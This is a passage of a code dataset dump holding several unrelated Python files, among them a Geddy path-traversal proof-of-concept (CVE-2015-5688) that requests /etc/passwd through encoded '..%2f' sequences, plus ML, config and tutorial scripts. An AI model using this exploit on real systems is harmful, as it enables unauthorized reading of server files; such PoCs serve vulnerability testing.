self.assertLess(result, 0.001)
def test_t_student(self):
rng = np.random.RandomState(42)
a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
result = paired_t_student(a, b, self.logger)
self.assertGreater(result, 0.3)
a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
result = paired_t_student(a, b, self.logger)
self.assertLess(result, 0.001)
| true
| true
|
f705c09c479088d7f96725e5df722801a0715965
| 5,653
|
py
|
Python
|
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | 2
|
2019-12-05T13:51:10.000Z
|
2019-12-20T08:02:35.000Z
|
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | null | null | null |
ibmsecurity/isam/base/network/felb/services/servers.py
|
ibm-enio/ibmsecurity
|
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
|
[
"Apache-2.0"
] | 1
|
2020-04-03T09:30:01.000Z
|
2020-04-03T09:30:01.000Z
|
import ibmsecurity.utilities.tools
import logging
logger = logging.getLogger(__name__)
module_uri = "/isam/felb/configuration/services/"
requires_modulers = None
requires_version = None
def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False):
"""
Creating a server
"""
change_required = _check_exist(isamAppliance, service_name, address, port=port)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Creating a server",
"{0}{1}/servers".format(module_uri, service_name, address),
{
"active": active,
"address": address,
"port": port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def delete(isamAppliance, service_name, address, check_mode=False, force=False):
"""
deletes a server from specified service name
"""
if force is True or _check_exist(isamAppliance, service_name, address) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete("Deleting a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def get(isamAppliance, service_name, address, check_mode=False, force=False):
"""
Retrieves server from specified service name
"""
return (
isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers))
def get_all(isamAppliance, service_name, check_mode=False, force=False):
"""
Retrieves a list of servers under a specified service
"""
return isamAppliance.invoke_get("Retrieving servers for a service",
"{0}{1}/servers".format(module_uri, service_name),
requires_version=requires_version, requires_modules=requires_modulers)
def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None,
check_mode=False,
force=False):
"""
Updating server
"""
change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure,
ssllabel)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put("Updating a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
{
"address": new_address,
"active": active,
"port": new_port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_modules=requires_modulers,
requires_version=requires_version)
else:
return isamAppliance.create_return_object()
def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False,
ssllabel=None):
"""
idempontency test
"""
org_obj = get(isamAppliance, service_name, address)
if org_obj['data']['address'] != new_address:
return True
elif org_obj['data']['active'] != active:
return True
elif org_obj['data']['port'] != new_port:
return True
elif org_obj['data']['weight'] != weight:
return True
elif org_obj['data']['secure'] != secure:
return True
elif org_obj['data']['ssllabel'] != ssllabel:
return True
else:
return False
def _check_exist(isamAppliance, service_name, address):
"""
idempotency test for delete function
"""
check_obj = {}
# Check weather the address with corresponding server exists
try:
check_obj = get(isamAppliance, service_name, address)
except:
return False
return True
def compare(isamAppliance1, isamAppliance2):
"""
Compare cluster configuration between two appliances
"""
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| 38.195946
| 120
| 0.552096
|
import ibmsecurity.utilities.tools
import logging
logger = logging.getLogger(__name__)
module_uri = "/isam/felb/configuration/services/"
requires_modulers = None
requires_version = None
def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False):
change_required = _check_exist(isamAppliance, service_name, address, port=port)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Creating a server",
"{0}{1}/servers".format(module_uri, service_name, address),
{
"active": active,
"address": address,
"port": port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def delete(isamAppliance, service_name, address, check_mode=False, force=False):
if force is True or _check_exist(isamAppliance, service_name, address) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete("Deleting a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def get(isamAppliance, service_name, address, check_mode=False, force=False):
return (
isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers))
def get_all(isamAppliance, service_name, check_mode=False, force=False):
return isamAppliance.invoke_get("Retrieving servers for a service",
"{0}{1}/servers".format(module_uri, service_name),
requires_version=requires_version, requires_modules=requires_modulers)
def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None,
check_mode=False,
force=False):
change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure,
ssllabel)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put("Updating a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
{
"address": new_address,
"active": active,
"port": new_port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_modules=requires_modulers,
requires_version=requires_version)
else:
return isamAppliance.create_return_object()
def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False,
ssllabel=None):
org_obj = get(isamAppliance, service_name, address)
if org_obj['data']['address'] != new_address:
return True
elif org_obj['data']['active'] != active:
return True
elif org_obj['data']['port'] != new_port:
return True
elif org_obj['data']['weight'] != weight:
return True
elif org_obj['data']['secure'] != secure:
return True
elif org_obj['data']['ssllabel'] != ssllabel:
return True
else:
return False
def _check_exist(isamAppliance, service_name, address):
check_obj = {}
try:
check_obj = get(isamAppliance, service_name, address)
except:
return False
return True
def compare(isamAppliance1, isamAppliance2):
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| true
| true
|
f705c13bef4357c4b974d68a76c4f8617f700d7c
| 1,417
|
py
|
Python
|
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:15:42.000Z
|
2019-10-10T06:15:42.000Z
|
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | 1
|
2020-05-27T19:42:06.000Z
|
2020-05-27T19:42:06.000Z
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define TensorFlow Probability version information."""
# We follow Semantic Versioning (https://semver.org/)
_MAJOR_VERSION = '0'
_MINOR_VERSION = '9'
_PATCH_VERSION = '0'
# When building releases, we can update this value on the release branch to
# reflect the current release candidate ('rc0', 'rc1') or, finally, the official
# stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a
# release branch, the current version is by default assumed to be a
# 'development' version, labeled 'dev'.
_VERSION_SUFFIX = 'dev'
# Example, '0.4.0-dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
| 38.297297
| 80
| 0.703599
|
_MAJOR_VERSION = '0'
_MINOR_VERSION = '9'
_PATCH_VERSION = '0'
_VERSION_SUFFIX = 'dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
| true
| true
|
f705c143029f1b8fb5a082a334e82961e60babb9
| 3,371
|
py
|
Python
|
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
# Copyright 2020 The ElasticDL Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import PIL.Image
import tensorflow as tf
from elasticdl.python.common.constants import Mode
def custom_model():
inputs = tf.keras.Input(shape=(28, 28), name="image")
x = tf.keras.layers.Reshape((28, 28, 1))(inputs)
x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x)
x = tf.keras.layers.Dropout(0.25)(x)
x = tf.keras.layers.Flatten()(x)
outputs = tf.keras.layers.Dense(10)(x)
return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model")
def prepare_data_for_a_single_file(file_object, filename):
"""
:param filename: training data file name
:param file_object: a file object associated with filename
"""
label = int(filename.split("/")[-2])
image = PIL.Image.open(file_object)
numpy_image = np.array(image)
example_dict = {
"image": tf.train.Feature(
float_list=tf.train.FloatList(value=numpy_image.flatten())
),
"label": tf.train.Feature(
int64_list=tf.train.Int64List(value=[label])
),
}
example = tf.train.Example(
features=tf.train.Features(feature=example_dict)
)
return example.SerializeToString()
def loss(labels, predictions):
labels = tf.reshape(labels, [-1])
return tf.reduce_mean(
input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=predictions, labels=labels
)
)
def optimizer(lr=0.01):
return tf.optimizers.SGD(lr)
def feed(dataset, mode, _):
def _parse_data(record):
if mode == Mode.PREDICTION:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32)
}
else:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32),
"label": tf.io.FixedLenFeature([1], tf.int64),
}
r = tf.io.parse_single_example(record, feature_description)
features = {
"image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0)
}
if mode == Mode.PREDICTION:
return features
else:
return features, tf.cast(r["label"], tf.int32)
dataset = dataset.map(_parse_data)
if mode == Mode.TRAINING:
dataset = dataset.shuffle(buffer_size=1024)
return dataset
def eval_metrics_fn():
return {
"accuracy": lambda labels, predictions: tf.equal(
tf.argmax(predictions, 1, output_type=tf.int32),
tf.cast(tf.reshape(labels, [-1]), tf.int32),
)
}
| 32.413462
| 77
| 0.644616
|
import numpy as np
import PIL.Image
import tensorflow as tf
from elasticdl.python.common.constants import Mode
def custom_model():
inputs = tf.keras.Input(shape=(28, 28), name="image")
x = tf.keras.layers.Reshape((28, 28, 1))(inputs)
x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x)
x = tf.keras.layers.Dropout(0.25)(x)
x = tf.keras.layers.Flatten()(x)
outputs = tf.keras.layers.Dense(10)(x)
return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model")
def prepare_data_for_a_single_file(file_object, filename):
label = int(filename.split("/")[-2])
image = PIL.Image.open(file_object)
numpy_image = np.array(image)
example_dict = {
"image": tf.train.Feature(
float_list=tf.train.FloatList(value=numpy_image.flatten())
),
"label": tf.train.Feature(
int64_list=tf.train.Int64List(value=[label])
),
}
example = tf.train.Example(
features=tf.train.Features(feature=example_dict)
)
return example.SerializeToString()
def loss(labels, predictions):
labels = tf.reshape(labels, [-1])
return tf.reduce_mean(
input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=predictions, labels=labels
)
)
def optimizer(lr=0.01):
return tf.optimizers.SGD(lr)
def feed(dataset, mode, _):
def _parse_data(record):
if mode == Mode.PREDICTION:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32)
}
else:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32),
"label": tf.io.FixedLenFeature([1], tf.int64),
}
r = tf.io.parse_single_example(record, feature_description)
features = {
"image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0)
}
if mode == Mode.PREDICTION:
return features
else:
return features, tf.cast(r["label"], tf.int32)
dataset = dataset.map(_parse_data)
if mode == Mode.TRAINING:
dataset = dataset.shuffle(buffer_size=1024)
return dataset
def eval_metrics_fn():
return {
"accuracy": lambda labels, predictions: tf.equal(
tf.argmax(predictions, 1, output_type=tf.int32),
tf.cast(tf.reshape(labels, [-1]), tf.int32),
)
}
| true
| true
|
f705c37d2339c79f6a9a632cefaf65a79808d37d
| 1,720
|
py
|
Python
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Geddy before v13.0.8 LFI''',
"description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''',
"severity": "high",
"references": [
"https://nodesecurity.io/advisories/geddy-directory-traversal",
"https://github.com/geddy/geddy/issues/697"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2015", "geddy", "lfi"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| 26.875
| 239
| 0.533721
|
import requests
def info():
return {
"author": "cckuailong",
"name": '''Geddy before v13.0.8 LFI''',
"description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''',
"severity": "high",
"references": [
"https://nodesecurity.io/advisories/geddy-directory-traversal",
"https://github.com/geddy/geddy/issues/697"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2015", "geddy", "lfi"],
}
def fingerprint(url):
return True
def poc(url):
result = {}
try:
url = format_url(url)
path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
def exp(url):
return poc(url)
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| true
| true
|
f705c380c38b745a99107f2f972df3893011b4c5
| 64
|
py
|
Python
|
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
import math
n = 100
print(sum(map(int, str(math.factorial(n)))))
| 21.333333
| 44
| 0.703125
|
import math
n = 100
print(sum(map(int, str(math.factorial(n)))))
| true
| true
|
f705c4e287fb6d6f6989f47abb2afa301f8bd782
| 2,415
|
py
|
Python
|
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
import os
import sys
import numpy as np
import cv2
import statistics
import datetime
def getMedian(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.median_grouped(values)
def getMean(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.mean(values)
def getMode(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
try:
mode = statistics.mode(values)
return mode
except statistics.StatisticsError: # all values are the same
return getMedian(arr,x,y)
method = sys.argv[1]
imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] # image
#direct = os.getcwd() + "/images/" # where to get test images
#saved = os.getcwd() + "/saved/" # where to get test images
direct = "/var/www/html/" # where to get test images
saved = "/var/www/html/" # where to get test images
i=0
images = []
for img in imgs:
image = cv2.imread(direct + img) # open template image
images.append(image)
(height, width) = image.shape[:2] # get dimensions
red = []
green = []
blue = []
for image in images:
redMatrix = [[0 for x in range(width)] for y in range(height)]
greenMatrix = [[0 for x in range(width)] for y in range(height)]
blueMatrix = [[0 for x in range(width)] for y in range(height)]
for x in range(height):
for y in range(width):
redMatrix[x][y] = image[x,y,0]
greenMatrix[x][y] = image[x,y,1]
blueMatrix[x][y] = image[x,y,2]
red.append(redMatrix)
green.append(greenMatrix)
blue.append(blueMatrix)
newImage = np.zeros((height,width,3), np.uint8)
for x in range(height):
for y in range(width):
rgb = []
if(method == "median"):
redMedian = getMedian(red,x,y)
greenMedian = getMedian(green,x,y)
blueMedian = getMedian(blue,x,y)
if(method == "mean"):
redMedian = getMean(red,x,y)
greenMedian = getMean(green,x,y)
blueMedian = getMean(blue,x,y)
if(method == "mode"):
redMedian = getMode(red,x,y)
greenMedian = getMode(green,x,y)
blueMedian = getMode(blue,x,y)
rgb.append(redMedian)
rgb.append(greenMedian)
rgb.append(blueMedian)
newImage[x][y] = rgb
cv2.imwrite(saved + "results.jpg", newImage) # save image
| 25.15625
| 68
| 0.59089
|
import os
import sys
import numpy as np
import cv2
import statistics
import datetime
def getMedian(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.median_grouped(values)
def getMean(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.mean(values)
def getMode(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
try:
mode = statistics.mode(values)
return mode
except statistics.StatisticsError:
return getMedian(arr,x,y)
method = sys.argv[1]
imgs = ["1.png","2.png", "3.png", "4.png", "5.png"]
"
i=0
images = []
for img in imgs:
image = cv2.imread(direct + img)
images.append(image)
(height, width) = image.shape[:2]
red = []
green = []
blue = []
for image in images:
redMatrix = [[0 for x in range(width)] for y in range(height)]
greenMatrix = [[0 for x in range(width)] for y in range(height)]
blueMatrix = [[0 for x in range(width)] for y in range(height)]
for x in range(height):
for y in range(width):
redMatrix[x][y] = image[x,y,0]
greenMatrix[x][y] = image[x,y,1]
blueMatrix[x][y] = image[x,y,2]
red.append(redMatrix)
green.append(greenMatrix)
blue.append(blueMatrix)
newImage = np.zeros((height,width,3), np.uint8)
for x in range(height):
for y in range(width):
rgb = []
if(method == "median"):
redMedian = getMedian(red,x,y)
greenMedian = getMedian(green,x,y)
blueMedian = getMedian(blue,x,y)
if(method == "mean"):
redMedian = getMean(red,x,y)
greenMedian = getMean(green,x,y)
blueMedian = getMean(blue,x,y)
if(method == "mode"):
redMedian = getMode(red,x,y)
greenMedian = getMode(green,x,y)
blueMedian = getMode(blue,x,y)
rgb.append(redMedian)
rgb.append(greenMedian)
rgb.append(blueMedian)
newImage[x][y] = rgb
cv2.imwrite(saved + "results.jpg", newImage)
| true
| true
|
f705c4fc494cdf40b01b01fb964de724d9ee0942
| 1,205
|
py
|
Python
|
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
#9TH PROGRAM
# THIS PROGRAM WILL HELP IN ACCESSING DICTIONARY ITEMS AND PERFROM CERTAIN OPERATIONS WITH DICTIONARY
ages = {} #EMPTY DICTIONARY
ages["Micky"] = 24
ages["Lucky"] = 25
print(ages)
keys = ages.keys # .keys prints all the keys avaialble in Dictionary
print(keys)
values = ages.values # .values prints all the values avaialble in Dictionary
print(values)
print(sorted(ages))
# NOTE Unable to sort print(sorted(ages.values))
print(ages.values) # Prints the values
# NOTE has_key() has been replaced by "in" in Python 3 , You can access like below.
# Syntax : "Values" in "dict"
if("Micky" in ages):
print("Micky is there")
else:
print("Micky is not there")
print(len(ages)) # Print the length of the dictionary
#Adding new item
# New initialization
ages = {"Snehasis" : "24" , "Sradhasis" : 25}
print(ages)
# New members
ages["LKP"] = 45 # Here value is saved as int
if("LKP" in ages):
updatedValue = ages.get("LKP") + 10
print("Updated Value = " , updatedValue)
print(ages)
ages["JYOTI"] = "38" # Here value is saved as string
if("JYOTI" in ages):
updatedValue = ages.get("JYOTI") + " New Age"
print("Updated Value = " , updatedValue)
print(ages)
| 23.173077
| 101
| 0.687137
|
ages = {}
ages["Micky"] = 24
ages["Lucky"] = 25
print(ages)
keys = ages.keys
print(keys)
values = ages.values
print(values)
print(sorted(ages))
print(ages.values)
if("Micky" in ages):
print("Micky is there")
else:
print("Micky is not there")
print(len(ages))
ages = {"Snehasis" : "24" , "Sradhasis" : 25}
print(ages)
ages["LKP"] = 45
if("LKP" in ages):
updatedValue = ages.get("LKP") + 10
print("Updated Value = " , updatedValue)
print(ages)
ages["JYOTI"] = "38"
if("JYOTI" in ages):
updatedValue = ages.get("JYOTI") + " New Age"
print("Updated Value = " , updatedValue)
print(ages)
| true
| true
|
f705c51665ca83673376bc29d03db188df991c5f
| 2,970
|
py
|
Python
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
from __future__ import print_function
import itertools
from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer
from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle
from PhysicsTools.HeppyCore.framework.event import Event
from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters
from DataFormats.FWLite import Events, Handle,Lumis
class SkimAnalyzerCount( Analyzer ):
#---------------------------------------------
# TO FINDS THE INITIAL EVENTS BEFORE THE SKIM
#---------------------------------------------
def __init__(self, cfg_ana, cfg_comp, looperName):
super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName)
self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False
self.verbose = getattr(self.cfg_ana, 'verbose', False)
def declareHandles(self):
super(SkimAnalyzerCount, self).declareHandles()
self.counterHandle = Handle("edm::MergeableCounter")
self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' )
def beginLoop(self, setup):
super(SkimAnalyzerCount,self).beginLoop(setup)
self.counters.addCounter('SkimReport')
self.count = self.counters.counter('SkimReport')
self.count.register('All Events')
if self.cfg_comp.isMC:
self.count.register('Sum Weights')
if not self.useLumiBlocks:
#print 'Will actually count events instead of accessing lumi blocks'
return True
print('Counting the total events before the skim by accessing luminosity blocks')
lumis = Lumis(self.cfg_comp.files)
totalEvents=0
for lumi in lumis:
if lumi.getByLabel('prePathCounter',self.counterHandle):
totalEvents+=self.counterHandle.product().value
else:
self.useLumiBlocks = False
break
if self.useLumiBlocks:
self.count.inc('All Events',totalEvents)
if self.cfg_comp.isMC:
self.count.inc('Sum Weights',totalEvents)
print('Done -> proceeding with the analysis')
else:
print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)')
def process(self, event):
if self.verbose:
print("\nProcessing run:lumi:event %d:%d:%d" % (
event.input.eventAuxiliary().id().run(),
event.input.eventAuxiliary().id().luminosityBlock(),
event.input.eventAuxiliary().id().event()))
if not self.useLumiBlocks:
self.readCollections( event.input )
self.count.inc('All Events')
if self.cfg_comp.isMC:
self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight())
return True
| 40.684932
| 121
| 0.619865
|
from __future__ import print_function
import itertools
from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer
from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle
from PhysicsTools.HeppyCore.framework.event import Event
from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters
from DataFormats.FWLite import Events, Handle,Lumis
class SkimAnalyzerCount( Analyzer ):
def __init__(self, cfg_ana, cfg_comp, looperName):
super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName)
self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False
self.verbose = getattr(self.cfg_ana, 'verbose', False)
def declareHandles(self):
super(SkimAnalyzerCount, self).declareHandles()
self.counterHandle = Handle("edm::MergeableCounter")
self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' )
def beginLoop(self, setup):
super(SkimAnalyzerCount,self).beginLoop(setup)
self.counters.addCounter('SkimReport')
self.count = self.counters.counter('SkimReport')
self.count.register('All Events')
if self.cfg_comp.isMC:
self.count.register('Sum Weights')
if not self.useLumiBlocks:
return True
print('Counting the total events before the skim by accessing luminosity blocks')
lumis = Lumis(self.cfg_comp.files)
totalEvents=0
for lumi in lumis:
if lumi.getByLabel('prePathCounter',self.counterHandle):
totalEvents+=self.counterHandle.product().value
else:
self.useLumiBlocks = False
break
if self.useLumiBlocks:
self.count.inc('All Events',totalEvents)
if self.cfg_comp.isMC:
self.count.inc('Sum Weights',totalEvents)
print('Done -> proceeding with the analysis')
